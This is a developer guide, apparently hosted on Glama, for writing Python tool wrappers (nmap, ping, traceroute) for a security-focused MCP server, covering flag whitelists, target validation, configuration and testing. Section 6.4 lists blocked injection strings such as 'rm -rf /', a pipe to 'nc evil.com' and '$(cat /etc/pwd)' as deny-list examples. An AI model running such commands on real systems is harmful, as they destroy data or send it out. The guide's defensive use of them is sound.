Skip to main content
Glama

Security MCP Server

by nordeim
MCP_Server_Tool_Development_Programming_Guide.md48.6 kB
# MCP Server Tool Development Programming Guide **Version:** 1.0 **Purpose:** Definitive guide for developing new tools for the Enhanced MCP Server --- ## Table of Contents 1. [Introduction](#introduction) 2. [Prerequisites](#prerequisites) 3. [Quick Start: Creating Your First Tool](#quick-start-creating-your-first-tool) 4. [Tool Architecture Deep Dive](#tool-architecture-deep-dive) 5. [Step-by-Step Development Process](#step-by-step-development-process) 6. [Security & Validation Patterns](#security--validation-patterns) 7. [Advanced Features Integration](#advanced-features-integration) 8. [Configuration & Policy Management](#configuration--policy-management) 9. [Testing Your Tool](#testing-your-tool) 10. [Best Practices & Patterns](#best-practices--patterns) 11. [Troubleshooting Guide](#troubleshooting-guide) 12. [Complete Reference Examples](#complete-reference-examples) --- ## 1. Introduction ### Purpose of This Guide This guide is the **single source of truth** for developing new tools for the Enhanced MCP Server. It provides: - Complete understanding of the tool development lifecycle - Proven patterns from production-ready implementations - Security-first design principles - Integration with circuit breakers, metrics, and health monitoring - Configuration-driven behavior patterns ### What is a Tool? In the MCP Server context, a **tool** is: - A Python class that wraps a system command (e.g., `nmap`, `ping`, `traceroute`) - Provides validated, secure execution of that command - Integrates with server infrastructure (metrics, circuit breakers, health checks) - Exposes functionality to MCP clients (Claude Desktop, HTTP API) ### Tool Lifecycle ``` Discovery → Registration → Validation → Execution → Monitoring → Cleanup ↓ ↓ ↓ ↓ ↓ ↓ server.py server.py base_tool.py base_tool.py metrics server.py ``` --- ## 2. Prerequisites ### Required Knowledge - **Python 3.8+**: Async/await, type hints, dataclasses - **Command-line tools**: Understanding of the tool you're wrapping - **Network security**: RFC1918, CIDR notation, input validation - **Pydantic**: Basic model validation (v1 and v2 compatibility) ### Required Files Structure ``` mcp_server/ ├── base_tool.py # Base class (DO NOT MODIFY) ├── server.py # Server implementation ├── config.py # Configuration management ├── circuit_breaker.py # Circuit breaker pattern ├── metrics.py # Metrics collection ├── health.py # Health monitoring └── tools/ # YOUR TOOLS GO HERE ├── __init__.py ├── nmap_tool.py # Reference implementation └── your_new_tool.py # Your tool ``` ### Environment Setup ```bash # Install dependencies pip install pydantic # Required for input validation # Optional but recommended pip install prometheus-client # For metrics pip install fastapi uvicorn # For HTTP transport testing ``` --- ## 3. Quick Start: Creating Your First Tool ### Minimal Working Tool (5 minutes) Create `mcp_server/tools/ping_tool.py`: ```python """Simple ping tool - minimal implementation.""" from mcp_server.base_tool import MCPBaseTool class PingTool(MCPBaseTool): """Ping a host to check connectivity.""" # REQUIRED: Command to execute command_name = "ping" # REQUIRED: Allowed flags (whitelist) allowed_flags = ["-c", "-W", "-i"] # Optional: Override defaults concurrency = 3 default_timeout_sec = 30.0 ``` **That's it!** This tool: - ✅ Auto-discovered by server - ✅ Validates RFC1918/lab.internal targets - ✅ Blocks dangerous shell metacharacters - ✅ Enforces allowed flags - ✅ Provides circuit breaker protection - ✅ Collects metrics - ✅ Handles timeouts and resource limits ### Testing Your Tool ```python from mcp_server.tools.ping_tool import PingTool from mcp_server.base_tool import ToolInput import asyncio async def test_ping(): tool = PingTool() # Valid execution result = await tool.run(ToolInput( target="192.168.1.1", extra_args="-c 3" )) print(f"Return code: {result.returncode}") print(f"Output: {result.stdout}") asyncio.run(test_ping()) ``` --- ## 4. Tool Architecture Deep Dive ### Class Hierarchy ``` MCPBaseTool (ABC) ↑ | YourTool (Concrete Implementation) ``` ### Required Class Variables ```python class YourTool(MCPBaseTool): # MANDATORY: Name of system command command_name: ClassVar[str] = "your_command" # RECOMMENDED: Whitelist of allowed flags allowed_flags: ClassVar[Optional[Sequence[str]]] = [ "-flag1", "-flag2", "--long-flag" ] # OPTIONAL: Concurrency limit (default: 2) concurrency: ClassVar[int] = 2 # OPTIONAL: Default timeout (default: 300s) default_timeout_sec: ClassVar[float] = 300.0 # OPTIONAL: Circuit breaker config circuit_breaker_failure_threshold: ClassVar[int] = 5 circuit_breaker_recovery_timeout: ClassVar[float] = 60.0 circuit_breaker_expected_exception: ClassVar[tuple] = (Exception,) ``` ### Tool Discovery Rules Your tool will be **auto-discovered** if: ✅ It's in the `mcp_server.tools` package (or configured package) ✅ It's a concrete subclass of `MCPBaseTool` ✅ Class name doesn't match exclusion patterns: - Prefixes: `Test*`, `Mock*`, `Abstract*`, `_*`, `Example*` - Suffixes: `*Base`, `*Mixin`, `*Interface` - Exact: `MCPBaseTool` To **explicitly exclude** a class: ```python class InternalHelper(MCPBaseTool): _is_tool = False # Won't be discovered command_name = "helper" ``` --- ## 5. Step-by-Step Development Process ### Phase 1: Planning #### 1.1 Understand Your Command ```bash # Study the command you're wrapping man nmap nmap --help # Identify: # - Required arguments # - Optional flags # - Dangerous flags (exclude these!) # - Output format # - Exit codes ``` #### 1.2 Security Assessment **Questions to answer:** - ❓ Can this command execute arbitrary code? (e.g., `--script` in nmap) - ❓ Can it write files? (restrict or validate paths) - ❓ Can it consume excessive resources? (set limits) - ❓ Does it accept shell metacharacters? (block them) - ❓ Can it scan public networks? (restrict targets) **Example risk matrix:** ```python # HIGH RISK - Requires strict controls allowed_flags = ["-sV"] # Service detection only # Blocked: -sS (SYN scan), -O (OS detection), --script (arbitrary scripts) # LOW RISK - More permissive allowed_flags = ["-c", "-W", "-i", "-q"] # Ping flags ``` ### Phase 2: Implementation #### 2.1 Create Tool File ```python """ Your tool description. Features: - What it does - Security controls - Usage examples Safety Controls: - List all safety measures - Restrictions - Validation rules """ import logging from typing import Sequence, Optional, ClassVar from mcp_server.base_tool import MCPBaseTool, ToolInput, ToolOutput log = logging.getLogger(__name__) class YourTool(MCPBaseTool): """One-line description for documentation.""" command_name = "your_command" allowed_flags = ["-safe-flag"] ``` #### 2.2 Define Allowed Flags (Critical!) ```python # Pattern 1: Simple whitelist allowed_flags = ["-v", "-q", "-c"] # Pattern 2: With value flags allowed_flags = [ "-c", # Count flag "-W", # Timeout flag "-i", # Interval flag ] # Also define flags that REQUIRE values _FLAGS_REQUIRE_VALUE = {"-c", "-W", "-i"} # Pattern 3: With extra allowed tokens (for optimization) _EXTRA_ALLOWED_TOKENS = { "5", # Common value for -c "1000", # Common value for --timeout } ``` #### 2.3 Override Defaults (Optional) ```python class SlowTool(MCPBaseTool): command_name = "slow_scanner" allowed_flags = ["-deep"] # Tool-specific overrides concurrency = 1 # Only one at a time default_timeout_sec = 1800.0 # 30 minutes # Circuit breaker tuning circuit_breaker_failure_threshold = 3 # Open after 3 failures circuit_breaker_recovery_timeout = 300.0 # 5 min recovery ``` ### Phase 3: Advanced Validation (Optional) #### 3.1 Custom Input Validation Override `_execute_tool` to add custom validation: ```python async def _execute_tool(self, inp: ToolInput, timeout_sec: Optional[float] = None) -> ToolOutput: """Execute with custom validation.""" # Custom validation logic validation_error = self._validate_custom_requirements(inp) if validation_error: return validation_error # Call base implementation return await super()._execute_tool(inp, timeout_sec) def _validate_custom_requirements(self, inp: ToolInput) -> Optional[ToolOutput]: """Add tool-specific validation.""" # Example: Validate network size for nmap if "/" in inp.target: network = ipaddress.ip_network(inp.target, strict=False) if network.num_addresses > 1024: error_context = ErrorContext( error_type=ToolErrorType.VALIDATION_ERROR, message=f"Network too large: {network.num_addresses} hosts", recovery_suggestion="Use /22 or smaller prefix", timestamp=datetime.now(), tool_name=self.tool_name, target=inp.target ) return self._create_error_output(error_context, inp.correlation_id or "") return None ``` #### 3.2 Custom Argument Parsing Override `_parse_args` for complex validation: ```python def _parse_args(self, extra_args: str) -> Sequence[str]: """Custom argument parsing with additional validation.""" # Call base parsing first tokens = super()._parse_args(extra_args) # Add custom logic validated = [] for token in tokens: # Example: Validate port specifications if token.startswith("-p"): if not self._validate_port_spec(token): raise ValueError(f"Invalid port specification: {token}") validated.append(token) return validated def _validate_port_spec(self, port_spec: str) -> bool: """Validate port specification format.""" # Your validation logic return True ``` #### 3.3 Argument Optimization Add smart defaults for better UX: ```python def _optimize_args(self, extra_args: str) -> str: """Add smart defaults if not specified.""" import shlex tokens = shlex.split(extra_args) if extra_args else [] optimized = [] # Check what's missing has_count = any("-c" in t for t in tokens) has_timeout = any("-W" in t for t in tokens) # Add defaults if not has_count: optimized.extend(["-c", "3"]) log.debug("optimization.added_default flag=-c value=3") if not has_timeout: optimized.extend(["-W", "5"]) log.debug("optimization.added_default flag=-W value=5") # Append original args optimized.extend(tokens) return " ".join(optimized) # Use in _execute_tool async def _execute_tool(self, inp: ToolInput, timeout_sec: Optional[float] = None) -> ToolOutput: # Optimize arguments optimized_args = self._optimize_args(inp.extra_args or "") # Create enhanced input enhanced_input = ToolInput( target=inp.target, extra_args=optimized_args, timeout_sec=timeout_sec or inp.timeout_sec, correlation_id=inp.correlation_id ) # Execute with base return await super()._execute_tool(enhanced_input, timeout_sec) ``` --- ## 6. Security & Validation Patterns ### 6.1 Input Validation Layers The base tool provides **4 layers of validation**: ``` Layer 1: Pydantic Validators (ToolInput model) ↓ target validation (RFC1918, .lab.internal) ↓ extra_args length limit (2048 bytes) ↓ metacharacter blocking (;,&,|,`,etc.) Layer 2: Command Resolution ↓ shutil.which() to find command ↓ Fail if command not in PATH Layer 3: Argument Parsing & Sanitization ↓ shlex.split() for safe parsing ↓ Token validation (alphanumeric + safe chars) ↓ Flag whitelist enforcement ↓ Value validation for flags Layer 4: Resource Limits (Unix/Linux) ↓ CPU time limit (rlimit) ↓ Memory limit (512MB default) ↓ File descriptor limit (256 default) ↓ Core dump disabled ``` ### 6.2 Target Validation Pattern **Built-in validation** (automatic): ```python # ToolInput validates these automatically: ✅ "192.168.1.1" # RFC1918 private IP ✅ "10.0.0.0/8" # RFC1918 network ✅ "172.16.0.0/12" # RFC1918 network ✅ "server.lab.internal" # .lab.internal hostname ❌ "8.8.8.8" # Public IP (rejected) ❌ "google.com" # Public hostname (rejected) ``` **Custom validation** (add in your tool): ```python def _validate_custom_requirements(self, inp: ToolInput) -> Optional[ToolOutput]: """Add tool-specific target validation.""" import ipaddress # Example: Reject loopback for network scans if self.command_name == "nmap": try: ip = ipaddress.ip_address(inp.target) if ip.is_loopback: error_context = ErrorContext( error_type=ToolErrorType.VALIDATION_ERROR, message="Loopback addresses not allowed for network scans", recovery_suggestion="Use a private network address", timestamp=datetime.now(), tool_name=self.tool_name, target=inp.target ) return self._create_error_output(error_context, inp.correlation_id or "") except ValueError: pass # Not an IP, continue return None ``` ### 6.3 Argument Validation Patterns #### Pattern 1: Simple Flag Whitelist ```python class SimpleTool(MCPBaseTool): command_name = "mytool" # Only these flags are allowed allowed_flags = ["-v", "-q", "-c"] # Auto-rejects: # ❌ -x (not in whitelist) # ❌ --unknown (not in whitelist) # ❌ $(cmd) (metacharacter) ``` #### Pattern 2: Flags with Required Values ```python class ToolWithValues(MCPBaseTool): command_name = "mytool" allowed_flags = ["-c", "-t", "-o"] # These flags MUST have values _FLAGS_REQUIRE_VALUE = {"-c", "-t"} # Valid: -c 5, -t 10, -o # Invalid: -c (missing value), -t (missing value) ``` #### Pattern 3: Complex Value Validation ```python def _sanitize_tokens(self, tokens: Sequence[str]) -> Sequence[str]: """Override for custom value validation.""" safe = [] expect_value_for = None for token in tokens: # Handle flag values if expect_value_for: # Validate value for previous flag if expect_value_for == "-c": if not token.isdigit() or int(token) > 100: raise ValueError(f"Invalid count: {token} (must be 1-100)") safe.append(token) expect_value_for = None continue # Check if flag requires value if token in self._FLAGS_REQUIRE_VALUE: expect_value_for = token safe.append(token) return safe ``` ### 6.4 Dangerous Pattern Prevention **Always block these:** ```python # Blocked by default in base_tool.py _DENY_CHARS = re.compile(r"[;&|`$><\n\r]") # Examples of blocked inputs: ❌ "arg1; rm -rf /" # Command injection ❌ "arg1 && malware" # Command chaining ❌ "arg1 | nc evil.com" # Pipe to external ❌ "arg1 `whoami`" # Command substitution ❌ "arg1 $(cat /etc/pwd)" # Command substitution ❌ "arg1 > /tmp/evil" # File redirection ``` **Additional patterns to block:** ```python # In your tool's validation def _parse_args(self, extra_args: str) -> Sequence[str]: tokens = super()._parse_args(extra_args) for token in tokens: # Block path traversal if ".." in token: raise ValueError(f"Path traversal detected: {token}") # Block absolute paths (if inappropriate) if token.startswith("/"): raise ValueError(f"Absolute paths not allowed: {token}") # Block wildcards (if risky for your tool) if "*" in token or "?" in token: raise ValueError(f"Wildcards not allowed: {token}") return tokens ``` --- ## 7. Advanced Features Integration ### 7.1 Configuration Integration #### Basic Pattern ```python from mcp_server.config import get_config class ConfigurableTool(MCPBaseTool): command_name = "mytool" allowed_flags = ["-v"] def __init__(self): super().__init__() self.config = get_config() self._apply_config() def _apply_config(self): """Apply configuration with safe defaults.""" try: # Read tool-specific config if hasattr(self.config, 'tool') and self.config.tool: if hasattr(self.config.tool, 'default_timeout'): # Clamp to safe range self.default_timeout_sec = max( 60.0, min(3600.0, float(self.config.tool.default_timeout)) ) except Exception as e: log.error("config.apply_failed error=%s using_defaults", str(e)) # Keep class defaults ``` #### Advanced: Policy-Based Controls ```python class PolicyControlledTool(MCPBaseTool): command_name = "scanner" BASE_ALLOWED_FLAGS = ["-safe", "-normal"] def __init__(self): super().__init__() self.config = get_config() self.allow_intrusive = False self._apply_config() def _apply_config(self): """Apply policy-based configuration.""" # Read security policy if hasattr(self.config, 'security') and self.config.security: if hasattr(self.config.security, 'allow_intrusive'): self.allow_intrusive = bool(self.config.security.allow_intrusive) if self.allow_intrusive: log.warning("policy.intrusive_enabled tool=%s", self.tool_name) else: log.info("policy.intrusive_disabled tool=%s", self.tool_name) @property def allowed_flags(self): """Dynamic flag list based on policy.""" flags = list(self.BASE_ALLOWED_FLAGS) if self.allow_intrusive: flags.extend(["-aggressive", "-deep-scan"]) return flags ``` ### 7.2 Result Parsing #### Pattern 1: Simple Line Parsing ```python def parse_output(self, output: str) -> Dict[str, Any]: """Parse tool output into structured data.""" result = { "hosts": [], "errors": [], "summary": {} } for line in output.split('\n'): line = line.strip() # Parse host lines if line.startswith("Host:"): result["hosts"].append(line.split(":", 1)[1].strip()) # Parse errors elif "ERROR" in line: result["errors"].append(line) return result ``` #### Pattern 2: Regex Extraction ```python import re class RegexParsingTool(MCPBaseTool): # Compile patterns once (performance) _HOST_PATTERN = re.compile(r'Host:\s+(\S+)') _PORT_PATTERN = re.compile(r'(\d+)/(tcp|udp)\s+(\w+)') def parse_output(self, output: str) -> Dict[str, Any]: """Parse with compiled regex patterns.""" hosts = self._HOST_PATTERN.findall(output) ports = [ {"port": int(m[0]), "proto": m[1], "state": m[2]} for m in self._PORT_PATTERN.finditer(output) ] return { "hosts": hosts, "ports": ports, "total_hosts": len(hosts), "open_ports": len([p for p in ports if p["state"] == "open"]) } ``` #### Pattern 3: Integration with ToolOutput ```python async def run(self, inp: ToolInput, timeout_sec: Optional[float] = None) -> ToolOutput: """Execute and enhance output with parsed data.""" # Call base execution result = await super().run(inp, timeout_sec) # Parse output if successful if result.returncode == 0 and result.stdout: try: parsed = self.parse_output(result.stdout) # Add to metadata result.ensure_metadata() result.metadata["parsed_data"] = parsed result.metadata["hosts_found"] = len(parsed.get("hosts", [])) log.info("output.parsed tool=%s hosts=%d", self.tool_name, parsed.get("total_hosts", 0)) except Exception as e: log.warning("output.parse_failed tool=%s error=%s", self.tool_name, str(e)) # Don't fail on parse errors, just log return result ``` ### 7.3 Scan Templates / Presets ```python from enum import Enum class ScanMode(Enum): """Predefined scan modes.""" QUICK = "quick" STANDARD = "standard" THOROUGH = "thorough" class TemplatedTool(MCPBaseTool): command_name = "scanner" allowed_flags = ["-q", "-s", "-t", "-v"] def _get_template_args(self, mode: ScanMode) -> str: """Get arguments for scan mode.""" templates = { ScanMode.QUICK: "-q -v", ScanMode.STANDARD: "-s", ScanMode.THOROUGH: "-t -v", } return templates.get(mode, templates[ScanMode.STANDARD]) async def run_with_template( self, target: str, mode: ScanMode = ScanMode.STANDARD, timeout_sec: Optional[float] = None ) -> ToolOutput: """Run with predefined template.""" args = self._get_template_args(mode) inp = ToolInput( target=target, extra_args=args, timeout_sec=timeout_sec ) log.info("template.scan tool=%s mode=%s target=%s", self.tool_name, mode.value, target) return await self.run(inp, timeout_sec) ``` ### 7.4 Caching for Performance ```python class CachedTool(MCPBaseTool): command_name = "lookup" allowed_flags = ["-v"] def __init__(self): super().__init__() self._cache: Dict[str, Any] = {} self._cache_hits = 0 self._cache_misses = 0 def _get_from_cache(self, key: str) -> Optional[Any]: """Thread-safe cache retrieval.""" if key in self._cache: self._cache_hits += 1 log.debug("cache.hit key=%s hits=%d", key, self._cache_hits) return self._cache[key] self._cache_misses += 1 return None def _add_to_cache(self, key: str, value: Any): """Add to cache with size limit.""" MAX_CACHE_SIZE = 1000 if len(self._cache) >= MAX_CACHE_SIZE: # Simple FIFO eviction first_key = next(iter(self._cache)) del self._cache[first_key] log.debug("cache.evicted key=%s size=%d", first_key, len(self._cache)) self._cache[key] = value def clear_cache(self): """Clear cache (useful for testing).""" self._cache.clear() self._cache_hits = 0 self._cache_misses = 0 log.info("cache.cleared tool=%s", self.tool_name) def get_cache_stats(self) -> Dict[str, int]: """Get cache statistics.""" return { "size": len(self._cache), "hits": self._cache_hits, "misses": self._cache_misses, "hit_rate": self._cache_hits / (self._cache_hits + self._cache_misses) if (self._cache_hits + self._cache_misses) > 0 else 0.0 } ``` --- ## 8. Configuration & Policy Management ### 8.1 Configuration File Structure Your tool can read from `config.yaml`: ```yaml # config.yaml security: allow_intrusive: false # Controls dangerous operations tool: default_timeout: 600 # Override class default default_concurrency: 1 # Override class default circuit_breaker: failure_threshold: 5 recovery_timeout: 120.0 resource_limits: max_memory_mb: 512 max_file_descriptors: 256 ``` ### 8.2 Reading Configuration ```python from mcp_server.config import get_config class MyTool(MCPBaseTool): def __init__(self): super().__init__() self.config = get_config() self._apply_config() def _apply_config(self): """Apply configuration with validation and clamping.""" try: # Read with fallback if hasattr(self.config, 'tool'): # Timeout with safe clamping timeout = getattr(self.config.tool, 'default_timeout', self.default_timeout_sec) self.default_timeout_sec = max(60.0, min(3600.0, float(timeout))) # Concurrency with safe clamping concurrency = getattr(self.config.tool, 'default_concurrency', self.concurrency) self.concurrency = max(1, min(10, int(concurrency))) log.debug("config.applied tool=%s timeout=%.1f concurrency=%d", self.tool_name, self.default_timeout_sec, self.concurrency) except Exception as e: log.error("config.apply_failed error=%s", str(e)) # Keep class defaults on error ``` ### 8.3 Environment Variable Overrides ```python import os class EnvAwareTool(MCPBaseTool): def __init__(self): super().__init__() self._apply_env_overrides() def _apply_env_overrides(self): """Apply environment variable overrides.""" # Tool-specific timeout env_timeout = os.getenv(f"{self.command_name.upper()}_TIMEOUT") if env_timeout: try: self.default_timeout_sec = float(env_timeout) log.info("env.override param=timeout value=%.1f", self.default_timeout_sec) except ValueError: log.warning("env.invalid_timeout value=%s", env_timeout) # Tool-specific concurrency env_concurrency = os.getenv(f"{self.command_name.upper()}_CONCURRENCY") if env_concurrency: try: self.concurrency = int(env_concurrency) log.info("env.override param=concurrency value=%d", self.concurrency) except ValueError: log.warning("env.invalid_concurrency value=%s", env_concurrency) ``` --- ## 9. Testing Your Tool ### 9.1 Unit Testing Pattern ```python # tests/test_my_tool.py import pytest from mcp_server.tools.my_tool import MyTool from mcp_server.base_tool import ToolInput, ToolOutput @pytest.fixture def tool(): """Create tool instance.""" return MyTool() @pytest.mark.asyncio async def test_basic_execution(tool): """Test basic tool execution.""" result = await tool.run(ToolInput( target="192.168.1.1", extra_args="-v" )) assert isinstance(result, ToolOutput) assert result.returncode is not None @pytest.mark.asyncio async def test_invalid_target(tool): """Test target validation.""" result = await tool.run(ToolInput( target="8.8.8.8", # Public IP, should fail extra_args="" )) assert result.returncode != 0 assert "private" in result.stderr.lower() @pytest.mark.asyncio async def test_invalid_flag(tool): """Test flag validation.""" result = await tool.run(ToolInput( target="192.168.1.1", extra_args="-X --dangerous" # Not in allowed_flags )) assert result.returncode != 0 assert "not allowed" in result.stderr.lower() def test_command_resolution(tool): """Test command exists.""" cmd = tool._resolve_command() assert cmd is not None, f"{tool.command_name} not found in PATH" def test_allowed_flags(tool): """Test allowed flags are defined.""" assert tool.allowed_flags is not None assert len(tool.allowed_flags) > 0 @pytest.mark.asyncio async def test_timeout_handling(tool): """Test timeout behavior.""" result = await tool.run( ToolInput(target="192.168.1.1"), timeout_sec=0.1 # Very short timeout ) # Should timeout gracefully assert result.timed_out or result.returncode != 0 ``` ### 9.2 Integration Testing ```python @pytest.mark.integration @pytest.mark.asyncio async def test_full_scan_workflow(tool): """Test complete scan workflow.""" # Execute scan result = await tool.run(ToolInput( target="192.168.1.0/24", extra_args="-v --quick" )) # Verify execution assert result.execution_time is not None assert result.correlation_id is not None # Parse output if result.returncode == 0 and result.stdout: parsed = tool.parse_output(result.stdout) assert isinstance(parsed, dict) assert "hosts" in parsed @pytest.mark.integration async def test_circuit_breaker_integration(tool): """Test circuit breaker behavior.""" # Force multiple failures for _ in range(tool.circuit_breaker_failure_threshold + 1): await tool.run(ToolInput( target="192.168.1.1", extra_args="--invalid-flag" # Cause failure )) # Circuit should be open if tool._circuit_breaker: from mcp_server.circuit_breaker import CircuitBreakerState assert tool._circuit_breaker.state == CircuitBreakerState.OPEN ``` ### 9.3 Property-Based Testing ```python from hypothesis import given, strategies as st @given( target=st.one_of( st.from_regex(r'192\.168\.\d{1,3}\.\d{1,3}', fullmatch=True), st.from_regex(r'10\.\d{1,3}\.\d{1,3}\.\d{1,3}', fullmatch=True), ) ) @pytest.mark.asyncio async def test_target_validation_property(tool, target): """Property: All RFC1918 addresses should be accepted.""" result = await tool.run(ToolInput(target=target)) # Should not fail on validation (may fail on execution) assert "Target must be" not in result.stderr ``` ### 9.4 Mock Testing for Development ```python from unittest.mock import AsyncMock, patch @pytest.mark.asyncio async def test_with_mock_command(): """Test without actual command execution.""" tool = MyTool() # Mock the subprocess execution mock_output = ToolOutput( stdout="Mocked output", stderr="", returncode=0, execution_time=1.0 ) with patch.object(tool, '_spawn', return_value=mock_output): result = await tool.run(ToolInput(target="192.168.1.1")) assert result.stdout == "Mocked output" assert result.returncode == 0 ``` --- ## 10. Best Practices & Patterns ### 10.1 Security Best Practices #### ✅ DO: ```python # 1. Use whitelist approach for flags allowed_flags = ["-safe", "-flag"] # Explicit allow # 2. Validate all input rigorously def _validate_input(self, value): if not self._is_safe(value): raise ValueError(f"Invalid input: {value}") # 3. Clamp configuration values timeout = max(60, min(3600, config_value)) # 4. Log security events log.warning("security.blocked_flag flag=%s tool=%s", flag, self.tool_name) # 5. Fail closed (deny by default) if flag not in self.allowed_flags: raise ValueError(f"Flag not allowed: {flag}") # 6. Use compiled regex for performance _PATTERN = re.compile(r'^[a-z0-9-]+$') ``` #### ❌ DON'T: ```python # 1. Don't use blacklist approach forbidden_flags = ["-X"] # Too easy to bypass # 2. Don't trust input cmd = f"mytool {user_input}" # Shell injection risk! # 3. Don't catch and ignore security errors try: self._validate(input) except ValueError: pass # NEVER DO THIS! # 4. Don't allow arbitrary code execution if "--script" in args: # Without validation, this is dangerous! # 5. Don't skip validation for "trusted" sources if source == "admin": # Still validate! ``` ### 10.2 Performance Best Practices ```python # 1. Compile regex patterns once class OptimizedTool(MCPBaseTool): _PATTERN = re.compile(r'pattern') # Class-level def parse(self, text): return self._PATTERN.findall(text) # Reuse # 2. Use caching for repeated operations def _expensive_operation(self, key): if key in self._cache: return self._cache[key] result = self._compute(key) self._cache[key] = result return result # 3. Limit concurrency appropriately concurrency = 1 # For heavy tools concurrency = 5 # For light tools # 4. Set realistic timeouts default_timeout_sec = 60 # For quick operations default_timeout_sec = 600 # For scans # 5. Clean up resources def clear_caches(self): self._cache.clear() log.debug("cache.cleared") ``` ### 10.3 Logging Best Practices ```python # Use structured logging with key=value pairs log.info("tool.execution target=%s args=%s timeout=%.1f", inp.target, inp.extra_args, timeout_sec) # Log security events at appropriate levels log.warning("security.blocked_flag flag=%s", dangerous_flag) log.error("security.injection_attempt input=%s", suspicious_input) # Log performance metrics log.debug("performance.optimization added=%s", optimization) log.info("performance.execution_time tool=%s duration=%.2fs", self.tool_name, execution_time) # Log configuration changes log.info("config.applied param=%s old=%s new=%s", param, old_value, new_value) # Don't log sensitive data log.info("auth.success user=%s", username) # OK log.info("auth.attempt password=%s", password) # NEVER! ``` ### 10.4 Error Handling Patterns ```python # Pattern 1: Validation errors def _validate(self, inp): if not self._is_valid(inp): error_context = ErrorContext( error_type=ToolErrorType.VALIDATION_ERROR, message="Validation failed", recovery_suggestion="Check input format", timestamp=datetime.now(), tool_name=self.tool_name, target=inp.target, metadata={"detail": "specific error"} ) return self._create_error_output(error_context, inp.correlation_id or "") return None # Pattern 2: Graceful degradation try: result = self._parse_output(output) except Exception as e: log.warning("parse.failed error=%s", str(e)) result = {"raw": output} # Fallback to raw # Pattern 3: Resource cleanup try: result = await self._execute() finally: self._cleanup_resources() # Pattern 4: Circuit breaker friendly try: result = await self._risky_operation() except SpecificError as e: # Let circuit breaker track this raise except UnexpectedError as e: # Log but don't break circuit log.error("unexpected.error error=%s", str(e)) # Return error output instead of raising return self._create_error_output(...) ``` --- ## 11. Troubleshooting Guide ### 11.1 Tool Not Discovered **Symptom:** Tool class exists but not loaded by server **Checklist:** ```python # 1. Check class name doesn't match exclusion patterns class MyTool(MCPBaseTool): # ✅ Good class TestTool(MCPBaseTool): # ❌ Excluded (Test* prefix) class ToolBase(MCPBaseTool): # ❌ Excluded (*Base suffix) # 2. Check it's in the correct package mcp_server/tools/my_tool.py # ✅ Correct location # 3. Check it's a concrete class class MyTool(MCPBaseTool): # ✅ Concrete command_name = "mytool" class AbstractTool(MCPBaseTool): # ❌ Missing command_name pass # 4. Check __init__.py exists mcp_server/tools/__init__.py # Must exist (can be empty) # 5. Enable debug logging LOG_LEVEL=DEBUG python -m mcp_server.server # 6. Check import errors python -c "from mcp_server.tools.my_tool import MyTool; print('OK')" ``` ### 11.2 Validation Failures **Symptom:** Valid inputs being rejected ```python # Debug validation def _parse_args(self, extra_args: str) -> Sequence[str]: log.debug("parse.start extra_args=%s", extra_args) try: tokens = shlex.split(extra_args) log.debug("parse.tokens count=%d tokens=%s", len(tokens), tokens) except Exception as e: log.error("parse.failed error=%s", str(e)) raise # Continue with validation... ``` ### 11.3 Command Not Found **Symptom:** Tool fails with "command not found" ```python # Test command resolution def test_command(): tool = MyTool() cmd = tool._resolve_command() print(f"Resolved: {cmd}") print(f"PATH: {os.getenv('PATH')}") # Common solutions: # 1. Install command: apt-get install nmap # 2. Add to PATH: export PATH=$PATH:/usr/local/bin # 3. Use full path: command_name = "/usr/bin/nmap" ``` ### 11.4 Circuit Breaker Open **Symptom:** Tool returns circuit breaker errors ```python # Check circuit breaker state tool = MyTool() if tool._circuit_breaker: print(f"State: {tool._circuit_breaker.state}") print(f"Failures: {tool._circuit_breaker._failure_count}") print(f"Threshold: {tool.circuit_breaker_failure_threshold}") # Reset circuit breaker (for testing) if tool._circuit_breaker: tool._circuit_breaker._failure_count = 0 tool._circuit_breaker.state = CircuitBreakerState.CLOSED ``` ### 11.5 Performance Issues ```python # 1. Check concurrency print(f"Concurrency: {tool.concurrency}") # Reduce if too high: concurrency = 1 # 2. Check timeout print(f"Timeout: {tool.default_timeout_sec}") # Increase if operations are slow # 3. Enable profiling import cProfile cProfile.run('asyncio.run(tool.run(inp))') # 4. Check resource limits # Increase if hitting limits: # MCP_MAX_MEMORY_MB=1024 # MCP_MAX_FILE_DESCRIPTORS=512 # 5. Monitor metrics info = tool.get_tool_info() print(f"Metrics: {info}") ``` --- ## 12. Complete Reference Examples ### 12.1 Simple Tool (Ping) ```python """ Simple ping tool with minimal features. Use this as a starting template for basic tools. """ from mcp_server.base_tool import MCPBaseTool from typing import ClassVar, Optional, Sequence class PingTool(MCPBaseTool): """ Ping a host to check connectivity. Features: - RFC1918 target restriction - Safe flag whitelist - Timeout handling Usage: tool = PingTool() result = await tool.run(ToolInput( target="192.168.1.1", extra_args="-c 4" )) """ command_name: ClassVar[str] = "ping" allowed_flags: ClassVar[Optional[Sequence[str]]] = [ "-c", # Count "-W", # Timeout "-i", # Interval "-q", # Quiet "-v", # Verbose ] # Flags requiring values _FLAGS_REQUIRE_VALUE = {"-c", "-W", "-i"} # Conservative settings for network tool concurrency: ClassVar[int] = 3 default_timeout_sec: ClassVar[float] = 30.0 ``` ### 12.2 Medium Complexity Tool (Traceroute) ```python """ Traceroute tool with custom validation and parsing. """ import re import logging from typing import ClassVar, Optional, Sequence, Dict, Any, List from mcp_server.base_tool import MCPBaseTool, ToolInput, ToolOutput log = logging.getLogger(__name__) class TracerouteTool(MCPBaseTool): """ Trace network path to a host. Features: - Path visualization - Hop parsing - Custom timeout validation """ command_name: ClassVar[str] = "traceroute" allowed_flags: ClassVar[Optional[Sequence[str]]] = [ "-n", # No DNS resolution "-m", # Max hops "-q", # Queries per hop "-w", # Wait time "-I", # ICMP mode ] _FLAGS_REQUIRE_VALUE = {"-m", "-q", "-w"} _HOP_PATTERN = re.compile(r'^\s*(\d+)\s+(.+)$') concurrency: ClassVar[int] = 2 default_timeout_sec: ClassVar[float] = 120.0 def _sanitize_tokens(self, tokens: Sequence[str]) -> Sequence[str]: """Custom validation for max hops.""" safe = [] expect_value = None for token in tokens: if expect_value: # Validate based on flag if expect_value == "-m": if not token.isdigit() or not (1 <= int(token) <= 64): raise ValueError(f"Max hops must be 1-64, got: {token}") elif expect_value == "-q": if not token.isdigit() or not (1 <= int(token) <= 10): raise ValueError(f"Queries must be 1-10, got: {token}") elif expect_value == "-w": if not token.isdigit() or not (1 <= int(token) <= 30): raise ValueError(f"Wait time must be 1-30s, got: {token}") safe.append(token) expect_value = None continue if token in self._FLAGS_REQUIRE_VALUE: expect_value = token safe.append(token) if expect_value: raise ValueError(f"{expect_value} requires 